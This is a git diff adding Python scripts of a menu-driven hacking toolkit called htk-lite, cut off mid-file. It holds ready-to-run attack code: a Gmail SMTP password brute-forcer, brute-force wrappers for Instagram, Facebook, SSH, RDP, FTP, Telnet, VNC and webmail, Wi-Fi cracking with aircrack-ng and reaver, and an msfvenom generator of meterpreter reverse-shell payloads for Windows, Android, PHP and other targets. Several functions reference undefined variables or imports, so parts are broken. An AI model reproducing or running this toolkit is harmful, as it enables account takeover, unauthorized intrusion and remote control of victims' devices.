+#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def netscan(): + print """ +{0}1: scan for devices in your network + +{1}2: scan for networks around you +\033[0m +go back: go back to main menu + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mScan:\033[0m ") + + if choice == "1": + os.system("netdiscover") + if choice == "2": + os.system("iwconfig") + m = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("airmon-ng start " + m) + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("\033[1m[y/n]>\033[0m ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) + os.system("airmon-ng stop " + i) + if choice == "go back": + os.system("") + except: + print "\n" +netscan() diff --git a/htk-lite/commandlist/password.py b/htk-lite/commandlist/password.py new file mode 100644 index 0000000..e21020c --- /dev/null +++ b/htk-lite/commandlist/password.py @@ -0,0 +1,385 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socket +import socks +import requests +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def gmail(): + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() + +def insta(): + insta = raw_input("\033[1mUsername:\033[0m ") + jl = raw_input("\033[1mWordlist:\033[0m ") + print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("\033[1mMode:\033[0m ") + ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) + +def fb(): + facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") + word = raw_input("\033[1m[WORDLIST->]:\033[0m ") + ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def blackhydra(): + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() + +def medusa(): + k = raw_input("\033[1mHost:\033[0m ") + u = raw_input("\033[1mUser:\033[0m ") + p = raw_input("\033[1mWordlist:\033[0m ") + os.system("medusa -d") + print "\n" + m = raw_input("\033[1mModule:\033[0m ") + n = raw_input("\033[1mPort:\033[0m ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) + +def aircrack(): + b = raw_input(G+"\033[1mBSSID: \033[0m") + e = raw_input(G+"\033[1mESSID: \033[0m") + w = raw_input(G+"\033[1mWordlist: \033[0m") + h = raw_input(G+"\033[1mHandshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"\033[1mInterface: \033[0m") + os.system("airmon-ng start" + i) + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) + os.system("airmon-ng stop" + i) + +def reaver(): + os.system("iwconfig") + j = raw_input("\033[1mSelect Interface:\033[0m ") + k = raw_input("\033[1mEnter BSSID:\033[0m ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) + +def password(): + print """ +{0}1: gmail +{1}2: instagram +{2}3: facebook +{3}4: hydra +{4}5: medusa +{5}6: aircrack-ng +{6}7: reaver +\033[0m +go back: go to main menu + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mAttack:\033[0m ") + if choice == "1": + gmail() + if choice == "2": + insta() + if choice == "3": + fb() + if choice == "4": + blackhydra() + if choice == "5": + medusa() + if choice == "6": + aircrack() + if choice == "7": + reaver() + if choice == "go back": + os.system("") + + except: + print "\n" + +password() diff --git a/htk-lite/commandlist/payload.py b/htk-lite/commandlist/payload.py new file mode 100644 index 0000000..998de4c --- /dev/null +++ b/htk-lite/commandlist/payload.py @@ -0,0 +1,84 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def payload(): + print """\033[0m033[1m +Payloads Available:\033[0m + +{0}1: windows/meterpreter/reverse_tcp + +{1}2: android/meterpreter/reverse_tcp + +{2}3: php/meterpreter/reverse_tcp + +{3}4: python/meterpreter/reverse_tcp + +{4}5: ruby/shell_reverse_tcp + +{5}6: osx/x86/vforkshell/reverse_tcp + +{6}7: linux/aarch64/meterpreter/reverse_tcp + + \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + choice = raw_input("Payload: ") + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + name = raw_input("Filename: ") + if choice == "1": + payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) + os.system(payload) + if choice == "2": + payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) + os.system(payload) + if choice == "3": + payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) + os.system(payload) + if choice == "4": + payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) + os.system(payload) + if choice == "5": + payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) + os.system(payload) + if choice == "6": + payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) + os.system(payload) + if choice == "7": + payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) + os.system(payload) +payload() diff --git a/htk-lite/commandlist/reboot.py b/htk-lite/commandlist/reboot.py new file mode 100644 index 0000000..5f3f7a9 --- /dev/null +++ b/htk-lite/commandlist/reboot.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() +reboot() diff --git a/htk-lite/commandlist/sysinfo.py b/htk-lite/commandlist/sysinfo.py new file mode 100644 index 0000000..761995e --- /dev/null +++ b/htk-lite/commandlist/sysinfo.py @@ -0,0 +1,66 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def sysinfo(): + os.system("iwconfig") + k = raw_input("\033[1mInterface:\033[0m ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system("uname -a") + os.system("whoami") +sysinfo() diff --git a/htk-lite/commandlist/terminal.py b/htk-lite/commandlist/terminal.py new file mode 100644 index 0000000..e61a2f2 --- /dev/null +++ b/htk-lite/commandlist/terminal.py @@ -0,0 +1,43 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def terminal(): + os.system("gnome-terminal") + +terminal() diff --git a/htk-lite/commandlist/traff.py b/htk-lite/commandlist/traff.py new file mode 100644 index 0000000..802b473 --- /dev/null +++ b/htk-lite/commandlist/traff.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def traff(): + os.system("iwconfig") + s = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("tcpdump -i " + s) +traff() diff --git a/htk-lite/commandlist/verscan.py b/htk-lite/commandlist/verscan.py new file mode 100644 index 0000000..a5d4ec4 --- /dev/null +++ b/htk-lite/commandlist/verscan.py @@ -0,0 +1,84 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def verscan(): + print """ +Services available: + +{0}ssh + +{1}mysql +\033[0m + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + service = raw_input("\033[1mService: \033[0m") + if service == "ssh": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + b = raw_input(G+"\033[1mTimeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system('echo "exit\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r sshver.rc') + os.system('rm -rf sshver.rc') + + if service == "mysql": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system('echo "exit\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') + except: + print "\n" +verscan() diff --git a/htk-lite/commandlist/wordlist.py b/htk-lite/commandlist/wordlist.py new file mode 100644 index 0000000..688072b --- /dev/null +++ b/htk-lite/commandlist/wordlist.py @@ -0,0 +1,44 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = 